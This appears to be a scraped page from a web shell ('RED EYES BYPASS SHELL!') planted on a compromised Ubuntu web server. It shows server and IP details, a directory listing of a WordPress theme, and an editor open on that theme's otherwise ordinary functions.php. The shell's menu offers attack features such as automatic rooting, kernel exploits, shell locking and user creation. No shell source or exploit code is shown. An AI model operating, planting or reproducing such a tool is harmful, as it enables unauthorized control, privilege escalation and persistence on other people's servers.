Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
garden-lawn-care /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
parts
[ DIR ]
drwxr-xr-x
patterns
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
block-patterns.php
816
B
-rwxr-xr-x
custom-setting.php
1.74
KB
-rwxr-xr-x
functions.php
5.41
KB
-rwxr-xr-x
license.txt
35.06
KB
-rwxr-xr-x
readme.txt
4.43
KB
-rwxr-xr-x
screenshot.png
371.24
KB
-rwxr-xr-x
style.css
31.95
KB
-rwxr-xr-x
theme.json
13.8
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * Garden Lawn Care functions and definitions * * @package Garden Lawn Care */ if ( ! function_exists( 'garden_lawn_care_setup' ) ) : function garden_lawn_care_setup() { if ( ! isset( $content_width ) ) $content_width = 640; /* pixels */ add_theme_support( 'post-thumbnails' ); add_theme_support( 'title-tag' ); add_theme_support( 'custom-logo', array( 'height' => 240, 'width' => 240, 'flex-height' => true, ) ); add_theme_support( 'custom-background', array( 'default-color' => 'ffffff' ) ); // Add support for Block Styles. add_theme_support( 'wp-block-styles' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); // Add support for responsive embedded content. add_theme_support( 'responsive-embeds' ); // Enqueue editor styles. add_editor_style( array( 'assets/css/editor-style.css' ) ); } endif; // garden_lawn_care_setup add_action( 'after_setup_theme', 'garden_lawn_care_setup' ); function garden_lawn_care_scripts() { wp_enqueue_style( 'garden-lawn-care-basic-style', get_stylesheet_uri() ); $garden_lawn_care_enable_animations = get_option( 'garden_lawn_care_enable_animations', true ); if ( $garden_lawn_care_enable_animations ) { //animation wp_enqueue_script( 'wow-js', get_theme_file_uri( '/assets/js/wow.js' ), array( 'jquery' ), true ); wp_enqueue_style( 'animate-css', get_template_directory_uri().'/assets/css/animate.css' ); } //font-awesome wp_enqueue_style( 'garden-lawn-care-fontawesome', get_template_directory_uri() . '/assets/font-awesome/css/all.css', array(), '5.15.3' ); // script.js wp_enqueue_script('garden-lawn-care-main-script', get_template_directory_uri() . '/assets/js/script.js', array('jquery'), '1.0.0', true); } add_action( 'wp_enqueue_scripts', 'garden_lawn_care_scripts' ); // Get start function function garden_lawn_care_enqueue_admin_script($hook) { // Admin JS wp_enqueue_script('garden-lawn-care-admin-js', get_theme_file_uri('/inc/dashboard/admin.js'), array('jquery'), true); wp_localize_script( 'garden-lawn-care-admin-js', 'garden_lawn_care', array( 'admin_ajax' => admin_url('admin-ajax.php'), 'wpnonce' => wp_create_nonce('garden_lawn_care_dismissed_notice_nonce') ) ); wp_enqueue_script('garden-lawn-care-admin-js'); wp_localize_script( 'garden-lawn-care-admin-js', 'garden_lawn_care_scripts_localize', array( 'ajax_url' => admin_url( 'admin-ajax.php' ) ) ); } add_action('admin_enqueue_scripts', 'garden_lawn_care_enqueue_admin_script'); //dismiss function add_action( 'wp_ajax_garden_lawn_care_dismissed_notice_handler', 'garden_lawn_care_ajax_notice_dismiss_fuction' ); function garden_lawn_care_ajax_notice_dismiss_fuction() { if (!wp_verify_nonce($_POST['wpnonce'], 'garden_lawn_care_dismissed_notice_nonce')) { exit; } if ( isset( $_POST['type'] ) ) { $type = sanitize_text_field( wp_unslash( $_POST['type'] ) ); update_option( 'dismissed-' . $type, TRUE ); } } //get start box function garden_lawn_care_custom_admin_notice() { // Check if the notice is dismissed if ( ! get_option('dismissed-get_started_notice', FALSE ) ) { // Check if not on the theme documentation page $garden_lawn_care_current_screen = get_current_screen(); if ($garden_lawn_care_current_screen && $garden_lawn_care_current_screen->id !== 'appearance_page_garden-lawn-care-guide-page') { $garden_lawn_care_theme = wp_get_theme(); ?> <div class="notice notice-info is-dismissible" data-notice="get_started_notice"> <div class="notice-div"> <div> <p class="theme-name"><?php echo esc_html($garden_lawn_care_theme->get('Name')); ?></p> <p><?php _e('For information and detailed instructions, check out our theme documentation.', 'garden-lawn-care'); ?></p> </div> <div class="notice-buttons-box"> <a class="button-primary livedemo" href="<?php echo esc_url( GARDEN_LAWN_CARE_LIVE_DEMO ); ?>" target="_blank"><?php esc_html_e('Live Demo', 'garden-lawn-care'); ?></a> <a class="button-primary buynow" href="<?php echo esc_url( GARDEN_LAWN_CARE_BUY_PRO ); ?>" target="_blank"><?php esc_html_e('Buy Now', 'garden-lawn-care'); ?></a> <a class="button-primary theme-install" href="themes.php?page=garden-lawn-care-guide-page"><?php _e('Theme Installation', 'garden-lawn-care'); ?></a> </div> </div> </div> <?php } } } add_action('admin_notices', 'garden_lawn_care_custom_admin_notice'); //after switch theme add_action('after_switch_theme', 'garden_lawn_care_after_switch_theme'); function garden_lawn_care_after_switch_theme () { update_option('dismissed-get_started_notice', FALSE ); } //get-start-function-end// // Block Patterns. require get_template_directory() . '/block-patterns.php'; require get_parent_theme_file_path( '/inc/dashboard/dashboard.php' ); require get_template_directory() .'/inc/TGM/tgm.php'; require get_template_directory() . '/custom-setting.php'; require get_parent_theme_file_path( '/inc/customizer/customizer.php' );
Close